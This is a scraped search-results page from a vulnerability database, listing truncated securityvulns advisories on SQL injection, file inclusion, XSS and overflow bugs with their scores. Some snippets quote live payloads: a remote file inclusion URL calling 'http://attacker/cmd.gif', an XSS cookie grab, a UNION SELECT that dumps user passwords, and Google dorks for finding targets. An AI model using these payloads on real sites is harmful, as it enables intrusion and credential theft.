Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2007/09/19 12:0 a.m.390 views

TPTI-07-15: Automated Solutions Modbus TCP Slave ActiveX Control Heap Corruption Vulnerability

TPTI-07-15: Automated Solutions Modbus TCP Slave ActiveX Control Heap Corruption Vulnerability http://www.zerodayinitiative.com/advisories/TPTI-07-15.html September 17, 2007 -- CVE ID: CVE-2007-4827 -- Affected Vendor: Automated Solutions -- Affected Products: Modbus RTU/ASCII/TCP Slave ActiveX...

7.5CVSS1AI score0.04734EPSS
Exploits0
securityvulns
securityvulns
added 2006/09/11 12:0 a.m.390 views

PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.1.6 / 4.4.4 Critical phpadmin bypass by inirestore Author: Maksymilian Arciemowicz cXIb8O3 Date: - - Written: 05.09.2006 - - Public: 09.09.2006 SecurityAlert Id: 42 CVE: CVE-2006-4625 SecurityRisk: High Affected Software: PHP 5.1.6 / 4.4.4 = x...

3.6CVSS5.7AI score0.00908EPSS
Exploits2
securityvulns
securityvulns
added 2012/10/29 12:0 a.m.389 views

Knowledge Base EE v4.62.0 - SQL Injection Vulnerability

Title: ====== Knowledge Base EE v4.62.0 - SQL Injection Vulnerability Date: ===== 2012-09-11 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=702 VL-ID: ===== 702 Common Vulnerability Scoring System: ==================================== 8.5 Introduction: =============...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2011/08/01 12:0 a.m.389 views

iCube Lab (product_details.php?cat_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability iCube Lab productdetails.php?catid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.icubelab.com/ Persian Gulf 4 Ever! Dork : "Powered by iCube Lab"...

3.5AI score
Exploits0
securityvulns
securityvulns
added 2006/08/11 12:0 a.m.389 views

Mambo/Joomla Component Remository v3.25 (mosConfig_absolute_path) Remote File Inclusion Vulnerability

.: insecurity research team :. ....:...:. . .:. | |/ :/ // :/ .:. : | | | / / :. . ..: ||| / .: .:.. .. ./ .:/:. ./. .:/: . ...:. .advisory. .:... :..................: o9.o8.2oo6 .. Affected Application: Remository v3.25 Mambo/Joomla CMS Component . . : contact :...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2014/03/03 12:0 a.m.388 views

Python buffer overflow

socket.recvfrominfo buffer overflow...

7.5CVSS3.5AI score0.28319EPSS
Exploits7References1Affected Software1
securityvulns
securityvulns
added 2013/12/09 12:0 a.m.385 views

Opencart Multiple Vulnerabilities

Title: Opencart Multiple Vulnerabilities Vendor: http://www.opencart.com Vulnerabilities: Arbitrary File Upload, XSS, Path Disclosure Vulnerable Version: opencart 1.5.6 prior versions also may be affected Exploitation: Remote with browser Impact: High Vendor Supplied Patch: N/A Original Advisory...

Exploits0
securityvulns
securityvulns
added 2011/04/11 12:0 a.m.383 views

XSS Vulnerabilities in 1024cms Admin Control Panel v1.1.0 Beta

================================================================================================================ 1024cms Admin Control Panel v1.1.0 Beta Complete-Modules Package - Cross-Site Scripting Vulnerability...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2011/08/17 12:0 a.m.382 views

PCVmedia (free_gallery.php?cat_id) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability PCVmedia freegallery.php?catid AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.pcvmedia.com/ Persian Gulf 4 Ever! Dork : "Website designed & developed by PCVmedia.com"...

3.1AI score
Exploits0
securityvulns
securityvulns
added 2002/09/18 12:0 a.m.382 views

Bug in Opera and Konqueror

/----------------+--------------------------------------+------------- | sp00fed packet | | advisory 2 | +----------------+--------------------------------------+-------------+ | Product: multiply vendors browsers | | Vulnerability: buffer overflow | | Danger: low |...

7.6AI score
Exploits0
securityvulns
securityvulns
added 2001/03/13 12:0 a.m.381 views

Security Advisory FreeBSD-SA-01:29.rwhod

-----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:29 Security Advisory FreeBSD, Inc. Topic: rwhod allows remote denial of service Category: core Module: rwhod Announced: 2001-03-12 Credits: Mark Huizer [email protected]...

7.6AI score
Exploits0
securityvulns
securityvulns
added 2000/05/25 12:0 a.m.381 views

Conserver Overflow

This overflow is trivial to fix and I've already emailed the developer, but I'm curious to know if it would be at all possible to exploit this overflow. In conserver-GNAC-6.15 in the source for the conserver daemon: group.c line 376: ------------------------- int CheckPasswdpCLServing, pwstring...

0.4AI score
Exploits0
securityvulns
securityvulns
added 2011/06/11 12:0 a.m.380 views

VMware Tools Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 VSR Security Advisory http://www.vsecurity.com/ - -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Advisory Name: VMware Tools Multiple Vulnerabilities Release Date: 2011-06-03 Application: VMware Guest Tools Severity:...

6.9CVSS0.4AI score0.0032EPSS
Exploits0
securityvulns
securityvulns
added 2014/12/01 12:0 a.m.379 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

10CVSS1.6AI score0.83162EPSS
Exploits81References38Affected Software28
securityvulns
securityvulns
added 2013/12/09 12:0 a.m.379 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

8.5CVSS1.6AI score0.23322EPSS
Exploits78References50Affected Software39
securityvulns
securityvulns
added 2012/09/02 12:0 a.m.378 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

5CVSS1.6AI score0.04195EPSS
Exploits10References13Affected Software9
securityvulns
securityvulns
added 2011/05/30 12:0 a.m.378 views

2245

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2245-1 [email protected] http://www.debian.org/security/ Giuseppe Iuculano May 29, 2011 http://www.debian.org/security/faq -...

9.3CVSS5.4AI score0.04375EPSS
Exploits6
securityvulns
securityvulns
added 2015/11/02 12:0 a.m.377 views

[ERPSCAN-15-026] Oracle E-Business Suite - SQL injection Vulnerability

ADVISORY INFORMATION Title: Oracle E-Business Suite SQL injection Advisory ID: ERPSCAN-15-026 Advisory URL: http://erpscan.com/advisories/erpscan-15-026-oracle-e-business-suite-sql-injection-vulnerability/ Date published: 20.10.2015 Vendors contacted: Oracle 2. VULNERABILITY INFORMATION Class:...

3.6CVSS0.01804EPSS
Exploits0
securityvulns
securityvulns
added 2015/08/24 12:0 a.m.373 views

Microsoft HTA (HTML Application) - Remote Code Execution Vulnerability (MS14-064)

Document Title: =============== Microsoft HTA HTML Application - Remote Code Execution Vulnerability MS14-064 References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1576 Video: http://youtu.be/Vkswz7vt23M...

9.3CVSS0.7AI score0.94996EPSS
Exploits39
securityvulns
securityvulns
added 2015/03/08 12:0 a.m.371 views

[SECURITY] CVE-2015-0254 XXE and RCE via XSL extension in JSTL XML tags

CVE-2015-0254 XXE and RCE via XSL extension in JSTL XML tags Severity: Important Vendor: The Apache Software Foundation Versions Affected: Standard Taglibs 1.2.1 The unsupported 1.0.x and 1.1.x versions may also be affected. Description: When an application uses x:parse or x:transform tags to...

7.5CVSS0.1326EPSS
Exploits0
securityvulns
securityvulns
added 2007/02/14 12:0 a.m.371 views

Microsoft Excel DoS

NULL pointer dereference on corrupted XML/XLS files...

4.3CVSS2.3AI score0.11611EPSS
Exploits1References2Affected Software1
securityvulns
securityvulns
added 2001/01/29 12:0 a.m.371 views

Remote Command Execution in guestserver.cgi + exploit

Remote Command execution vulnerability in Lars Ellingsen's guestserver.cgi found at http://www.guestserver.com/ Exploit code at bottom. by: fish stiqz [email protected] Overview: From http://www.stud.ntnu.no/larsell/guestbook/: Guestserver is a guestbook system that enables you to have your own...

7.7AI score
Exploits0
securityvulns
securityvulns
added 2012/02/15 12:0 a.m.370 views

TELUS Security Labs VR - Oracle Java Web Start Command Argument Injection Remote Code Execution

Oracle Java Web Start Command Argument Injection Remote Code Execution TSL ID: TSL20120214-01 1. Affected Software Oracle Java Development Kit JDK 6 Update 30 and prior Oracle Java Development Kit JDK 7 Update 2 and prior Oracle JavaFX 2.0.2 and prior Oracle Java Runtime Environment JRE 6 Update ...

10CVSS9.8AI score0.59369EPSS
Exploits17
securityvulns
securityvulns
added 2010/05/11 12:0 a.m.368 views

pmwiki: persistent cross site scripting (XSS), CVE-2010-1481

pmwiki: persistent cross site scripting XSS, CVE-2010-1481 References https://vulners.com/cve/CVE-2010-1481 http://int21.de/cve/CVE-2010-1481-pmwiki-xss.html Description The table feature of pmwiki is vulnerable to persistent cross site scripting XSS. The value of the width-parameter is not...

3.5CVSS5.4AI score0.00869EPSS
Exploits3
securityvulns
securityvulns
added 2007/08/10 12:0 a.m.368 views

Coppermine Photo Gallery (yabbse.inc.php) Remote File Inclusion Vulnerability

Coppermine Photo Gallery 1.3.1 Remote File Inclusion Vulnerability DoRk:"Powered by Coppermine Photo Gallery" Vuln. code: requireonce"$sourcedir/Load.php";requireonce"$sourcedir/Security.php"; Exploit: www.server.com/path/bridge/yabbse.inc.php?sourcedir=Sh3LL Author:Ma$tEr-0F-De$a$t0r...

3AI score
Exploits0
securityvulns
securityvulns
added 2008/10/24 12:0 a.m.367 views

Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution (958644)

Microsoft Security Bulletin MS08-067 – Critical Vulnerability in Server Service Could Allow Remote Code Execution 958644 Published: October 23, 2008 Version: 1.0 General Information Executive Summary This security update resolves a privately reported vulnerability in the Server service. The...

10CVSS1.5AI score0.98751EPSS
Exploits12
securityvulns
securityvulns
added 2006/09/08 12:0 a.m.366 views

BinGoPHP News <= 3.01 [bnrep] Remote File Include Vulnerability

--------------------------------------------------------------------------- BinGoPHP News = 3.01 bnrep Remote File Include Vulnerability --------------------------------------------------------------------------- Discovered By Kw3RLn Romanian Security Team : hTTp://RST-CREW.net : Remote : Yes...

1.5AI score
Exploits0
securityvulns
securityvulns
added 2012/12/10 12:0 a.m.365 views

Update on CVE assigned for Wordpress Plugin Simple Gmail Login

Application- Wordpress Plugin Simple Gmail Login Exploit - Stack Trace Error URL- http://wordpress.org/extend/plugins/simple-gmail-login/ Author- Aditya Balapure Link - http://adityabalapure.blogspot.in/ CVE Assigned- CVE-2012-6313. Description Once you have installed this plugin you can login to...

5CVSS6.2AI score0.07182EPSS
Exploits1
securityvulns
securityvulns
added 2012/09/02 12:0 a.m.365 views

XSS in PrestaShop

Advisory ID: HTB23091 Product: PrestaShop Vendor: PrestaShop, Inc. Vulnerable Versions: 1.4.7, 1.4.8 and probably prior Tested Version: 1.4.7, 1.4.8 Vendor Notification: May 9, 2012 Public Disclosure: August 29, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-2517...

6.4AI score0.01888EPSS
Exploits3
securityvulns
securityvulns
added 2009/08/19 12:0 a.m.365 views

HP Network Node Manager remote console weak files permissions

Weak permissions for C:Program FilesHP OpenView allows executable files and system service file spoofing...

7.2CVSS3AI score0.00501EPSS
Exploits1References1Affected Software1
securityvulns
securityvulns
added 2006/05/23 12:0 a.m.364 views

UBB.threads >= 6.4.x Remote File Inclusion

Anomaly 1n The System presents UBB.threads = 6.4.x Remote File Inclusion founded by V4mu in 04/20/2006 URL: http://www.ubbcentral.com Google dork: allinurl:"/ubbthreads/" exploit: /addpostnewpoll.php?addpoll=preview&thispath=http://attacker/cmd.gif?&cmd=id contact: irc.gigachat.net A1TS milw0rm.c...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2004/02/26 12:0 a.m.364 views

FreeCHAT DoS

No description provided...

1.2AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2007/11/26 12:0 a.m.363 views

PHP 5.2.4 mail.force_extra_parameters unsecure

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 PHP 5.2.4 mail.forceextraparameters unsecure Author: Maksymilian Arciemowicz cXIb8O3 SecurityReason Date: - - Written: 06.09.2007 - - Public: 0x.0x.2007 SecurityReason Research SecurityAlert Id: 47 CVE: CVE-2007-3378 SecurityRisk: Medium Affected...

6.8CVSS8.3AI score0.05331EPSS
Exploits2
securityvulns
securityvulns
added 2007/02/20 12:0 a.m.363 views

IrfanView DoS

Program hangs on corrupted WMF files open...

4.3CVSS2AI score0.10487EPSS
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2004/07/05 12:0 a.m.362 views

Unreal ircd ip cloacking protection bypass

To hide real IP hash of IP address with simple hashing algorithm is used...

0.6AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2013/07/19 12:0 a.m.361 views

[email protected]

Title: ====== ePhoto Transfer v1.2.1 iOS - Multiple Web Vulnerabilities Date: ===== 2013-07-17 References: =========== http://www.vulnerability-lab.com/getcontent.php?id=1017 VL-ID: ===== 1017 Common Vulnerability Scoring System: ==================================== 6.6 Introduction: ============...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2007/02/26 12:0 a.m.361 views

Microsoft Windows Explorer DoS

Application explorer.exe crashes on browsing folder with corrupted WMF file no need to click file itself...

7.1CVSS1.5AI score0.16388EPSS
Exploits0References2Affected Software1
securityvulns
securityvulns
added 2000/07/19 12:0 a.m.360 views

S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4

ID: S21SEC-003-en Title: Vulnerabilities in Stalker's CommuniGate Pro v3.2.4 Date: 03/04/2000 Status: Vendor contacted Scope: Remote command execution as superuser Platforms: Linux, probably others Author: llmora, fjserna Location: http://www.s21sec.com/en/avisos/s21sec-003-en.txt Release: Public...

Exploits0
securityvulns
securityvulns
added 2015/01/19 12:0 a.m.359 views

Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities

Memory corruptions, headers injection, restrictions bypass...

7.5CVSS3AI score0.65657EPSS
Exploits4Affected Software3
securityvulns
securityvulns
added 2008/01/02 12:0 a.m.359 views

[Full-disclosure] IBM Domino Web Access Upload Module inotes6w.dll SEH Overwrite Exploit

This one is the same offset as dwa7w and the same class id as inotes6. Basically inotes6 and inotes6w share the same class id, except that inotes6w is unicode. dwa7w is unicode and has a different class id. Code is inline, I would attach it except for the fact that I set off way to many av scanne...

9.3CVSS0.4AI score0.44184EPSS
Exploits25
securityvulns
securityvulns
added 2005/04/13 12:0 a.m.359 views

Microsoft Security Bulletin MS05-019 Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service (893066)

Microsoft Security Bulletin MS05-019 Vulnerabilities in TCP/IP Could Allow Remote Code Execution and Denial of Service 893066 Issued: April 12, 2005 Version: 1.0 Summary Who should read this document: Customers who use Microsoft Windows Impact of Vulnerability: Remote Code Execution Maximum...

7.5CVSS0.7AI score0.80855EPSS
Exploits13
securityvulns
securityvulns
added 2014/06/14 12:0 a.m.358 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

9.3CVSS1.6AI score0.99998EPSS
Exploits76References46Affected Software28
securityvulns
securityvulns
added 2010/11/01 12:0 a.m.357 views

XSS и SQL Injection уязвимости в CMS WebManager-Pro

Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting и SQL Injection уязвимостях в CMS WebManager-Pro это украинская коммерческая CMS. XSS WASC-08: http://site/index.php?word=2220onMouseOver=alertdocument.cookie20 SQL Injection Authentication Bypass WASC-19: На странице...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2008/12/14 12:0 a.m.357 views

Meta Cart Free Database Disclosure

Meta Cart Free Database Disclosure AUTHOR : Sina Yazdanmehr R3d.W0rm Discovered by : Sina Yazdanmehr R3d.W0rm Our Site : Http://IRCRASH.COM IRCRASH Team Members : Dr.Crash - R3d.w0rm Sina Yazdanmehr - Hadi Kiamarsi Download : http://www.metalinks.com/metacart.htm DORK : "Powered by MetaCart" Bug...

1.3AI score
Exploits0
securityvulns
securityvulns
added 2003/06/09 12:0 a.m.357 views

zenTrack Remote Command Execution Vulnerabilities

Subject: zenTrack Remote Command Execution Vulnerabilities Author: farking [email protected] Product: zenTrack 2.4.1 latest and below Vendor: http://zendocs.phpzen.net/zentrack / http://sourceforge.net/projects/zentrack/ Status: Vendor contacted 27/05/2003 Location:...

1AI score
Exploits0
securityvulns
securityvulns
added 2012/10/15 12:0 a.m.356 views

ESA-2012-025: EMC NetWorker Module for Microsoft Applications (NMM) Multiple Vulnerabilities

ESA-2012-025.txt -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ESA-2012-025: EMC NetWorker Module for Microsoft Applications NMM Multiple Vulnerabilities. EMC Identifier: ESA-2012-025 CVE Identifier: CVE-2012-2284,CVE-2012-2290 Severity Rating: See below for individual severity scores EMC...

9.3CVSS1.5AI score0.03626EPSS
Exploits0
securityvulns
securityvulns
added 2011/08/27 12:0 a.m.356 views

Alfazeta (list-prodotti.php?idcategoria) Remote SQL injection Vulnerability

IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Alfazeta list-prodotti.php?idcategoria AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.alfazeta.net/ Persian Gulf 4 Ever! Dork : inurl:list-prodotti.php?idcategoria=...

3.5AI score
Exploits0
securityvulns
securityvulns
added 2008/11/24 12:0 a.m.356 views

Microsoft Internet Explorer saved pages crossite scripting

Crossite scripting in context of local machine is possible on saving URL with address like http://site/--scriptalert"XSS"/script...

4.3CVSS0.1AI score0.10733EPSS
Exploits0References3
securityvulns
securityvulns
added 2007/04/20 12:0 a.m.356 views

ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vunlerability

ZDI-07-018: IBM Tivoli Monitoring Express Universal Agent Heap Overflow Vunlerability http://www.zerodayinitiative.com/advisories/ZDI-07-018.html April 18, 2007 -- CVE ID: CVE-2007-2137 -- Affected Vendor: IBM -- Affected Products: IBM Tivoli Monitoring Express 6.1 -- Vulnerability Details: This...

10CVSS1.5AI score0.07735EPSS
Exploits0
securityvulns
securityvulns
added 2007/04/05 12:0 a.m.356 views

PHP-FUSION Arcade Module (cid) Remote SQL Injection Vuln

-------------------------------- PHP-FUSION Arcade Module cid Remote SQL Injection Vuln -------------------------------- Bulan: xoron xoron.biz -------------------------------- Exploit: index.php?op=viewgamelist&cid=-1//union//select//null,username,userpassword,null,null,null//from//fusionusers/...

0.5AI score
Exploits0
Total number of security vulnerabilities5000